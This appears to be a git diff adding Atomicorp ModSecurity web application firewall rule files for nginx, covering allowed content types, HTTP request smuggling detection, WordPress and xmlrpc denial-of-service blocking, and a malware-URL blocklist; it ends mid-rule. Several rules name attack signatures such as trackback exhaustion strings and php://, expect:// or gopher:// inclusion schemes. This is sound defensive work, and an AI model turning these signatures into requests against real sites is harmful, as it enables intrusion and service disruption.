+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+#
+SecAction "phase:1,id:'333792',t:none,nolog,noauditlog,pass, setvar:'tx.allowed_request_content_type=application/x-www-form-urlencoded|multipart/form-data|text/xml|application/xml|application/x-amf|text/html|application/x-mal-client-data|application/octet-stream|text/plain|application/soap xml|application/soap+xml|application/json|application/json-rpc|application/vnd.svn-svndiff|image/jpeg|application/vnd.ms-sync.wbxml|message/rfc822|application/x-java-serialized-object|text/calendar|image/png|image/gif|image/jpg|application/x-fcs|application/vnd.svn-skel|text/vcard|application/vnd.open|application/x-git-upload-pack-request|application/dns-message'"
+
+
+#restrict content types to prevent possible bypass attacks
+SecRule REQUEST_HEADERS:Content-Type "^([^;\s]+)" "phase:1,t:none,chain,pass,nolog,noauditlog,id:'333791',severity:'4'"
+SecRule TX:0 "!@within %{tx.allowed_request_content_type}" "t:none,ctl:forceRequestBodyVariable=On"
+
+SecRule REQUEST_HEADERS:Content-Type "^(text/xml|application/(soap|xml))"         "chain,id:334357,rev:3,phase:1,t:none,t:lowercase,pass,nolog,noauditlog"
+ SecRule REQBODY_PROCESSOR "!@streq XML" "ctl:requestBodyProcessor=XML"
+
+
+#El5 doesnt have modsec 2.9, so this can only be enabled on EL6 and above
+#SecRule REQUEST_HEADERS:Content-Type "application/json" #     "id:'334367',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON"
+#
+#     
+
+#Skip binary/octect for nginx amplify
+#User-Agent: nginx-amplify-agent/0.34-2
+#Content-Type: binary/octet-stream
+SecRule REQUEST_HEADERS:Content-Type "^binary/octet-stream$"  "phase:2,t:none,id:336719,pass,nolog,noauditlog,chain,skipAfter:END_391213"
+SecRule REQUEST_HEADERS:User-Agent "^nginx-amplify-agent" "t:none" 
+
+#ModSecurity parses only three content types:
+#      application/x-www-form-urlencoded, multipart/form-data request and
+#      text/xml.
+#
+#      The protection provided for any other type is inferior.
+SecRule REQUEST_METHOD "!^(?:GET|HEAD|PROPFIND|OPTIONS)$" "phase:2,chain,t:none,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Request content type is not allowed by policy',id:'391213',severity:'4',logdata:'%{matched_var}'"
+        SecRule REQUEST_HEADERS:Content-Type "^([^;\s]+)" "chain,capture"
+                                SecRule TX:0 "!^%{tx.allowed_request_content_type}$" "t:none,ctl:forceRequestBodyVariable=On"
+
+SecMarker END_391213
+
diff --git a/nginx-waf/01_asl_content_smuggling.conf b/nginx-waf/01_asl_content_smuggling.conf
new file mode 100644
index 0000000..6e81340
--- /dev/null
+++ b/nginx-waf/01_asl_content_smuggling.conf
@@ -0,0 +1,42 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Copyright 2005-2023 by Atomicorp, Inc. all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+# Detect HTTP Smuggling attempts by checking for multiple conflicting headers
+# Rule to detect multiple Content-Length headers
+SecRule &REQUEST_HEADERS:Content-Length "@ge 2" "id:300111,rev:1,phase:2,t:none,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules: HTTP Smuggling Attack: Multiple Content-Length headers detected',severity:CRITICAL"
+# Rule to detect multiple Transfer-Encoding headers
+SecRule &REQUEST_HEADERS:Transfer-Encoding "@ge 2" "id:300112,rev:1,phase:2,t:none,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules: HTTP Smuggling Attack: Multiple Transfer-Encoding headers detected',severity:CRITICAL"
+# Rule to detect both Content-Length and Transfer-Encoding headers in the same request
+SecRule REQUEST_HEADERS:Content-Length "[0-9]+" "chain,id:300113,rev:2,phase:2,t:none,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules: HTTP Smuggling Attack: Both Content-Length and Transfer-Encoding headers detected',severity:CRITICAL"
+SecRule REQUEST_HEADERS:Transfer-Encoding "chunked" "t:none,t:lowercase"
+# Rule to detect inconsistent Content-Length and Transfer-Encoding headers
+SecRule REQUEST_HEADERS:Content-Length "[0-9]+" "chain,id:300114,rev:2,phase:2,t:none,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules: HTTP Smuggling Attack: Inconsistent Content-Length and Transfer-Encoding headers detected',severity:CRITICAL"
+SecRule REQUEST_HEADERS:Transfer-Encoding "!@rx ^(identity|chunked)$" "t:none,t:lowercase"
diff --git a/nginx-waf/01_asl_content_z.conf b/nginx-waf/01_asl_content_z.conf
new file mode 100644
index 0000000..c882396
--- /dev/null
+++ b/nginx-waf/01_asl_content_z.conf
@@ -0,0 +1,35 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.9 and up
+#
+# Created by Atomicorp (http://www.atomicorp.com)
+# Copyright 2015-2019 by Atomicorp, Inc., all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+#
+SecRule REQUEST_HEADERS:Content-Type "application/json"      "id:'354367',phase:1,t:none,t:lowercase,pass,nolog,noauditlog,ctl:requestBodyProcessor=JSON"
diff --git a/nginx-waf/03_asl_dos.conf b/nginx-waf/03_asl_dos.conf
new file mode 100644
index 0000000..8a49bf6
--- /dev/null
+++ b/nginx-waf/03_asl_dos.conf
@@ -0,0 +1,97 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Copyright 2005-2019 by Atomicorp, Inc., all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+
+SecRule RESPONSE_STATUS "@streq 408" "phase:5,t:none,log,auditlog,pass,rev:1,id:343434,msg:'Atomicorp.com WAF Rules: Client Connection dropped by Apache due to slow connection, possible Slowaris attack',severity:'4'"
+
+#/?CtrlFunc_
+SecRule REQUEST_METHOD "@streq POST" "chain,severity:2,log,t:none,deny,status:403,auditlog,phase:1,id:331215,rev:1,msg:'Atomicorp.com WAF Rules: CtrlFunc Brute Force Attack Dropped'"
+SecRule REQUEST_URI "@beginsWith /?CtrlFunc_" "t:none"
+
+#DOS Rules go right up front
+#Wordpress Resource Exhaustion attack
+SecRule REQUEST_URI "@pm /wp-trackback\.php"         "phase:1,id:'393939',t:none,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:1,id:393940,t:none,pass,nolog,noauditlog,skipAfter:END_DOS_CHECKS_WP"
+
+        SecRule ARGS:charset "(?:utf-8,utf-8,utf-8,utf-8,utf-8,utf-8|,.*,.*,.*,.*,)"         "phase:1,deny,status:403,log,deny,auditlog,t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,id:390639,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Just In Time Patch: WordPRess trackback resource exhaustion attack'"
+
+        #Wordpress Resource Exhaustion attack exploit
+        SecRule ARGS:title "abcedfgabcedfgabcedfgabcedfg"         "phase:1,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:390640,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Just In Time Patch: WordPRess trackback resource exhaustion attack'"
+
+        SecMarker END_DOS_CHECKS_WP
+
+
+#Another variant of a DOS attack
+SecRule REQUEST_URI "\?(?:ptrxcz|xclzve)_"         "log,auditlog,phase:1,deny,log,status:403,t:none,t:urlDecodeUni,t:lowercase,id:370145,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Known wormsign'"
+
+#/?CtrlFunc_
+SecRule REQUEST_URI "\?-?[0-9]{3,6}=-?[0-9]{3,6}"  "severity:2,log,auditlog,t:none,deny,status:403,phase:1,id:331216,rev:2,msg:'Atomicorp.com WAF Rules: Wordpress DOS Attack Dropped',chain"
+SecRule REQUEST_URI "!(^/administrator/)" "t:none,t:lowercase"
+
+#long lines
+SecRule REQUEST_METHOD "@streq HEAD" "chain,severity:2,log,auditlog,t:none,deny,phase:1,id:331217,rev:1,msg:'Atomicorp.com WAF Rules: Possible DOS Attack Dropped'"
+SecRule REQUEST_URI "\?[0-9a-z]{2000,}"  "t:none,t:lowercase"
+
+#xmlrpc DOS attacks
+SecRule &REQUEST_HEADERS:Content-Type "@eq 0"     "log,auditlog,chain,phase:1,rev:3,t:none,deny,log,status:403,msg:'Atomicorp.com WAF Rules: xmlrpc DOS attack',id:'392331',severity:'2'"
+        SecRule REQUEST_HEADERS:Content-Length "!^0$" "t:none,chain"
+	SecRule REQUEST_URI "xmlrpc\.php"  "t:none,t:urlDecodeUni,t:lowercase"
+
+#Per count DOS checks
+SecAction "nolog,noauditlog,pass,id:350115,phase:1,t:none,setvar:'tx.dos_burst_time_slice=60',setvar:'tx.dos_counter_threshold=5',setvar:'tx.dos_block_timeout=600'"
+
+SecRule IP:DOS_BLOCK "@eq 1" "log,auditlog,chain,phase:1,id:350116,deny,log,status:404,severity:2,msg:'Atomicorp.com WAF Rules: Potential Denial of Service (DoS) Attack Identified from %{tx.real_ip} (%{tx.dos_block_counter} hits since last alert)',setvar:ip.dos_block_counter=+1"
+	SecRule &IP:DOS_BLOCK_FLAG "@eq 0" "setvar:ip.dos_block_flag=1,expirevar:ip.dos_block_flag=60,setvar:tx.dos_block_counter=%{ip.dos_block_counter},setvar:ip.dos_block_counter=0"
+
+# Block and track # of requests but don't log, then skip because its already blocked
+SecRule IP:DOS_BLOCK "@eq 1" "phase:1,id:'350117',t:none,deny,status:404,noauditlog,nolog,severity:2,nolog,setvar:ip.dos_block_counter=+1"
+SecRule IP:DOS_BLOCK "@eq 1" "phase:5,id:'350118',t:none,nolog,noauditlog,pass,skipAfter:END_DOS_PROTECTION_CHECKS"
+
+# Count the number of requests to the protected resoures
+#SecRule REQUEST_FILENAME "@pmFromFile dos_protected.txt"
+SecRule REQUEST_FILENAME "xmlrpc\.php"  "phase:5,id:'350112',t:none,t:urlDecodeUni,t:lowercase,nolog,noauditlog,pass,setvar:ip.dos_counter=+1"
+
+# If the request count is greater than or equal to our thresholds
+# then set the burst counter
+SecRule IP:DOS_COUNTER "@gt %{tx.dos_counter_threshold}" "phase:5,id:'350113',t:none,nolog,noauditlog,pass,t:none,setvar:ip.dos_burst_counter=+1,expirevar:ip.dos_burst_counter=%{tx.dos_burst_time_slice},setvar:!ip.dos_counter"
+
+# Check DOS Burst Counter
+# Check the burst counter - if greater than or equal to 2, then we set the IP
+# block variable for 5 mins and issue an alert.
+SecRule IP:DOS_BURST_COUNTER "@ge 2" "log,auditlog,phase:5,id:'350114',rev:1,severity:3,t:none,log,pass,msg:'Atomicorp.com WAF Rules: Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',setvar:ip.dos_block=1,expirevar:ip.dos_block=%{tx.dos_block_timeout},tag:'no_ar'"
+
+
+SecMarker END_DOS_PROTECTION_CHECKS
+
+#SecRule REQUEST_BASENAME "xmlrpc\.php"  # "chain,phase:2,deny,log,auditlog,severity:2,id:'350116',rev:1,msg:'Atomicorp.com WAF Rules: Wodpress XML Pingback (Disable if you want to allow pingbacks to Wordpress)',t:none,t:lowercase,t:urlDecodeUni"
+#SecRule REQUEST_BODY|XML:/* "pingback\.ping" "t:none,t:lowercase"
diff --git a/nginx-waf/05_asl_exclude.conf b/nginx-waf/05_asl_exclude.conf
new file mode 100644
index 0000000..231e688
--- /dev/null
+++ b/nginx-waf/05_asl_exclude.conf
@@ -0,0 +1,12 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+SecRule REQUEST_FILENAME "\.*" "phase:2,id:91043,t:none,t:lowercase,pass,nolog,noauditlog"
+
+
+# Current Sigs with known issues. 
+# Distribution of this work or derivative of this work in any form is 
+# prohibited unless prior written permission is obtained from the 
+# copyright holder. 
+#
+# DO NOT MODIFY THIS FILE
+# Make your own exclude list as 00_asl_custom_exclude.conf
+# ---ASL-CONFIG-FILE---
diff --git a/nginx-waf/10_asl_antimalware.conf b/nginx-waf/10_asl_antimalware.conf
new file mode 100644
index 0000000..b2901ec
--- /dev/null
+++ b/nginx-waf/10_asl_antimalware.conf
@@ -0,0 +1,87 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Anti Malware rules
+#
+# Created by Prometheus Global (http://www.prometheus-group.com)
+# Copyright 2005-2019 by Atomicorp, Inc. all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+# Phase 2 rules
+
+
+#skip this for certain file types
+SecRule REQUEST_FILENAME "\.((m|j)pe?g4?|bmp|tiff?|p((p|g|b)m|n(g|m))|gif|js|css|ico|avi|w(mv|ebp)|mp(3|4)|cgm|svg|swf|og(m|v|x))$" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:333946,skipAfter:END_ANTI_MALWARE"
+
+SecRule REQUEST_URI "/imp/compose\.php"  "phase:2,pass,id:333947,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_ANTI_MALWARE"
+
+SecRule ARGS|REQUEST_URI|!ARGS:/description/|!ARGS:resolution|!ARGS:/subject/|!ARGS:/body/|!ARGS:SAMLResponse|!ARGS:SAMLResponse|!ARGS:message|!ARGS:/txt/|!ARGS:/solution/|XML:/* "@pm http:// https:// ftp:// ftps:// ogg:// data:// php:// zlib:// gopher://"         "phase:2,id:338812,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:338370,t:none,pass,nolog,noauditlog,skipAfter:END_ANTI_MALWARE"
+
+
+# Broadcheck
+#SecRule REQUEST_HEADERS:Referer|ARGS "!@pmFromFile malware-exclusion-local.txt" #        "t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:360000,rev:2,severity:2,msg:'Blocklist Malware Site (AE)'"
+SecRule REQUEST_URI|ARGS|!ARGS:wpReason|!ARGS:/description/|!ARGS:resolution|!ARGS:/subject/|!ARGS:/body/|!ARGS:SAMLResponse|!ARGS:message|!ARGS:/txt/|!ARGS:/solution/|XML:/* "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"         "log,auditlog,phase:2,deny,log,status:403,chain,capture,t:none,t:urlDecodeUni,t:replaceNulls,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:360000,rev:7,severity:2,msg:'Atomicorp.com Malware Blocklist: Malware Site detected in URL/Argument (AE)',logdata:'%{TX.0}'"
+SecRule REQUEST_URI|ARGS|!ARGS:wpReason|!ARGS:resolution|!ARGS:/description/|!ARGS:/subject/|!ARGS:/body/|!ARGS:SAMLResponse|!ARGS:/txt/|!ARGS:message|XML:/* "@pmFromFile malware-blacklist.txt"  "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace"
+
+# Rule 330002: Blocklist of known malware sites w/ Anti-evasion features
+#SecRule REQUEST_URI "!(?:/imp/compose\.php)" #        "capture,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:360002,rev:1,severity:2,msg:'Atomicorp.com Malware Blocklist:  Malware Site detected in ARGS/Body (AE)',chain,logdata:'%{TX.0}'"
+#SecRule REQUEST_BODY|ARGS|!ARGS:resolution|!ARGS:/description/|!ARGS:/subject/|!ARGS:/body/|!ARGS:/txt/|XML:/* "(?:ogg|zlib|(?:ht|f)tps?)\:/" "chain"
+##SecRule REQUEST_BODY|ARGS "!@pmFromFile malware-exclusion-local.txt" chain
+#SecRule REQUEST_BODY|ARGS|!ARGS:/description/|!ARGS:/subject/|!ARGS:/body/|!ARGS:/txt/|XML:/* "@pmFromFile malware-blacklist.txt"
+
+# Rule 330003: Blocklist of known malware sites
+#SecRule REQUEST_URI "!(?:/imp/compose\.php)" #        "capture,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:360003,rev:5,severity:2,msg:'Atomicorp.com Malware Blocklist: Malware Site detected in URI',chain,logdata:'%{TX.0}'"
+#SecRule REQUEST_URI "(?:ogg|zlib|(?:ht|f)tps?)\:/.*" "chain"
+##SecRule REQUEST_URI "!@pmFromFile malware-exclusion-local.txt" "chain"
+#SecRule REQUEST_URI "@pmFromFile malware-blacklist.txt"
+
+#Rule 330004: Blocklist suspicious sites in referral
+#SecRule REQUEST_HEADERS:Referer "@pmFromFile malware-blacklist.txt" #        "capture,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:360004,rev:2,severity:2,msg:'Atomicorp.com Malware Blocklist: Suspicious Blocklist Malware Site detected in Referral',logdata:'%{TX.0}'"
+#
+
+# Rule 330005: Blocklist of known malware sites w/ Anti-evasion features
+SecRule REQUEST_BODY|REQUEST_URI|ARGS|!ARGS:wpReason|!ARGS:/description/|!ARGS:resolution|!ARGS:/subject/|!ARGS:/body/|!ARGS:SAMLResponse|!ARGS:/txt/|XML:/* "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"           "log,auditlog,phase:2,deny,log,status:403,capture,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,id:360005,rev:1,severity:2,msg:'Atomicorp.com Malware Blocklist:  Malware Site detected in ARGS/Body (AE)',chain,logdata:'%{TX.0}'"
+#SecRule REQUEST_BODY|ARGS "!@pmFromFile malware-exclusion-local.txt" chain
+SecRule REQUEST_BODY|REQUEST_URI|ARGS|!ARGS:wpReason|!ARGS:/description/|!ARGS:/subject/|!ARGS:/body/|!ARGS:/txt/|!ARGS:SAMLResponse "@pmFromFile malware-blacklist.txt" "t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace"
+
+##Rule 360005: Local malware lists
+##SecRule REQUEST_HEADERS:Referer|ARGS "!@pmFromFile malware-exclusion-local.txt" ##        "t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:360000,rev:2,severity:2,msg:'Blocklist Malware Site (AE)'"
+#SecRule ARGS "@pmFromFile malware-blacklist-local.txt" #        "t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:360005,rev:2,severity:2,msg:'Local Blocklist Malware Site (AE)'"
+#
+## Rule 330006: Blocklist of known malware sites w/ Anti-evasion features
+#SecRule REQUEST_URI "!(?:/imp/compose\.php)" #        "t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:360006,rev:1,severity:2,msg:'Local Malware Site in ARGS/Body (AE)',chain"
+#SecRule REQUEST_BODY|ARGS "(?:ogg|zlib|(?:ht|f)tps?)\:/.*" "chain"
+##SecRule REQUEST_BODY|ARGS "!@pmFromFile malware-exclusion-local.txt" chain
+#SecRule REQUEST_BODY|ARGS "@pmFromFile malware-blacklist-local.txt"
+#
+## Rule 330003: Blocklist of known malware sites
+#SecRule REQUEST_URI "!(?:/imp/compose\.php)" #        "t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:360007,rev:4,severity:2,msg:'Local Malware Site in URI',chain"
+#SecRule REQUEST_URI "(?:ogg|zlib|(?:ht|f)tps?)\:/.*" "chain"
+##SecRule REQUEST_URI "!@pmFromFile malware-exclusion-local.txt" "chain"
+#SecRule REQUEST_URI "@pmFromFile malware-blacklist-local.txt"
+#
+##Rule 330004: Blocklist suspicious sites in referral
+#SecRule REQUEST_HEADERS:Referer "@pmFromFile malware-blacklist-local.txt" #        "t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:360008,rev:2,severity:2,msg:'Suspicious Local Blocklist Malware Site in Referral'"
+#
+SecMarker END_ANTI_MALWARE
diff --git a/nginx-waf/10_asl_rules.conf b/nginx-waf/10_asl_rules.conf
new file mode 100644
index 0000000..f818fdc
--- /dev/null
+++ b/nginx-waf/10_asl_rules.conf
@@ -0,0 +1,6585 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+SecRule REQUEST_FILENAME "/modules\.php" "phase:2,id:91044,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91045,t:none,pass,nolog,skipAfter:END_RULES_91045"
+
+SecRule ARGS|!ARGS:/target/|!ARGS:/redirect/|!ARGS:cforms_action_page|!ARGS:storyext|!ARGS:/^config/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:message|!ARGS:/^config/|!ARGS:SitePath|!ARGS:PreviewImage|!ARGS:Exlink|!ARGS:story|!ARGS:/page/|!ARGS:user_website|!ARGS:configuration[MODULE_PAYMENT_GOOGLECHECKOUT_MODE]|!ARGS:configParams[api][configParamValue]|!ARGS:q|!ARGS:stories_topics|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  